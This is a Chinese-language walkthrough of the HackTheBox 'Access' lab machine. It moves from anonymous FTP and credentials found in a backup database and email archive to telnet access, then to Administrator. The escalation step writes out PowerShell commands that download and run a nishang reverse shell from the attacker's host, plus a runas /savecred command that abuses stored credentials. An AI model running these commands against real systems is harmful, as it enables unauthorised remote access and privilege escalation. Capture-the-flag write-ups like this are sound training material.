Hackthebox - Access

靶场信息

靶场类型

信息收集

Nmap

┌──(root💀kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.10.98 
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-24 22:29 EDT
Nmap scan report for 10.10.10.98
Host is up (0.34s latency).
Not shown: 65532 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 23/tcp)
HOP RTT       ADDRESS
1   338.15 ms 10.10.14.1
2   338.30 ms 10.10.10.98

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.52 seconds

这里有个 ftp,使用匿名用户查看

FTP

┌──(root💀kali)-[~/Desktop]
└─# ftp 10.10.10.98                                                                                                         
Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.

登入后有两个文件夹

ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  09:16PM       <DIR>          Backups
08-24-18  10:00PM       <DIR>          Engineer
226 Transfer complete.

Backups 和 Engineer 里分别有一个文件

ftp> ls backups
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  09:16PM              5652480 backup.mdb
226 Transfer complete.
ftp> ls engineer
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18  01:16AM                10870 Access Control.zip
226 Transfer complete.

使用 get 给它下载下来,backup.mdb 比较大,多等待一下

去查看一下 backup.mdb 的文件

漏洞利用

Zip

┌──(root💀kali)-[~/Desktop]
└─# strings backup.mdb|grep access
access4u@security

我们找到了一个密码,应该是解压密码,去尝试解压一下

┌──(root💀kali)-[~/Desktop]
└─# ls Access\ Control.pst                                                              2 ⨯
'Access Control.pst'

解压成功

PST

使用 readpst 来提取文件

┌──(root💀kali)-[~/Desktop]
└─# readpst Access\ Control.pst 
Opening PST file and indexes...
Processing Folder "Deleted Items"
        "Access Control" - 2 items done, 0 items skipped.

然后查看一下

┌──(root💀kali)-[~/Desktop]
└─# cat Access\ Control.mbox

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

在里面找到一个密码

username = security
password = 4Cc3ssC0ntr0ller

去尝试登录 23 端口

┌──(root💀kali)-[~/Desktop]
└─# telnet 10.10.10.98                                
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service 

login: security
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>whoami
access\security

成功拿到一个 user 权限的 shell

C:\Users\security\Desktop>type user.txt
ff1f3b48913b213a31ff6756d2553d38

成功得到一个 user 权限的 flag 文件

权限提升

C:\Users\security>powershell whoami
access\security

确认 powershell 存在并可执行命令

┌──(root💀kali)-[~/Desktop]
└─# cp /opt/shells/Invoke-PowerShellTcp.ps1 nishang.ps1

我们使用 nishang 来进行提权

使用 python3 开启一个 http 服务

python3 -m http.server 80
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 4444

将上面这句代码添加到 nishang 最后一行,然后使用 nc 监听一个端口

nc -nvlp 4444
powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.9/nishang.ps1')"

然后执行

PS C:\Users\security>whoami
access\security

现在我们得到了一个交互式 shell 了,其实这一步可以不做,不过我喜欢在 shell 内输入命令,而不能使用删除键就很难受

https://github.com/411Hall/JAWS

接着我们使用 JAWS 来进行枚举

powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.9/jaws-enum.ps1')"
cmd.exe                   764 security /q /k C:\Windows\system32\login.cmd

这里看到了一个有趣的东西,我们可以去看看这是什么

C:\Users\security>type C:\Windows\system32\login.cmd
@echo off
rem
rem  Default global login script for the Telnet Server
rem
rem  In the default setup, this command script is executed when the
rem  initial command shell is invoked.  It, in turn, will try to invoke
rem  the individual user's login script.
rem

echo *===============================================================
echo Microsoft Telnet Server.
echo *===============================================================

cd /d %HOMEDRIVE%\%HOMEPATH%

这是脚本的内容

C:\Users\security>cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
                                                       Type: Domain Password
    User: ACCESS\Administrator

使用 cmdkey /list 找到了存储的登录凭证

PS C:\Users\Public\Desktop>dir

    Directory: C:\Users\Public\Desktop

Mode                LastWriteTime     Length Name                                                                                                                                                                  
----                -------------     ------ ----                                                                                                                                                                  
-a---         8/22/2018  10:18 PM       1870 ZKAccess3.5 Security System.lnk

在 public 用户的桌面发现了一个快捷方式文件,查看一下

PS C:\Users\Public\Desktop> type "ZKAccess3.5 Security System.lnk"
L?F?@ ??7???7???#?P/P?O? ?:i?+00?/C:\R1M?:Windows???:?▒M?:*wWindowsV1MV?System32???:?▒MV?*?System32▒X2P?:?
                                                                                                           runas.exe???:1??:1?*Yrunas.exe▒L-K??E?C:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico?%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico?%?
                       ?wN?▒?]N?D.??Q???`?Xaccess?_???8{E?3
                                                           O?j)?H???
                                                                    )??[?_???8{E?3
                                                                                  O?j)?H???
                                                                                           )??[?        ??1SPS??XF?L8C???&?m?e*S-1-5-21-953262931-566350628-63446256-500

可以看到这一行

\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"

这里的意思是 可以使用 administrator 权限运行 access.exe 文件,我们把后面的 access.exe 文件换成我们自己的命令,那不就可以提权了?

我们把这里的 access.exe 换成我们的 nishang

runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.9/nishang.ps1')"
┌──(root💀kali)-[~/Desktop]
└─# nc -nvlp 4444                                                                                                                                                                                               1 ⨯
listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.98] 49166
Windows PowerShell running as user Administrator on ACCESS
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
access\administrator

成功拿到 administrator 权限的 shell

PS C:\users\administrator\desktop> type root.txt
6e1586cc7ab230a8d297e8f933d904cf

成功拿到 root 权限的 flag 文件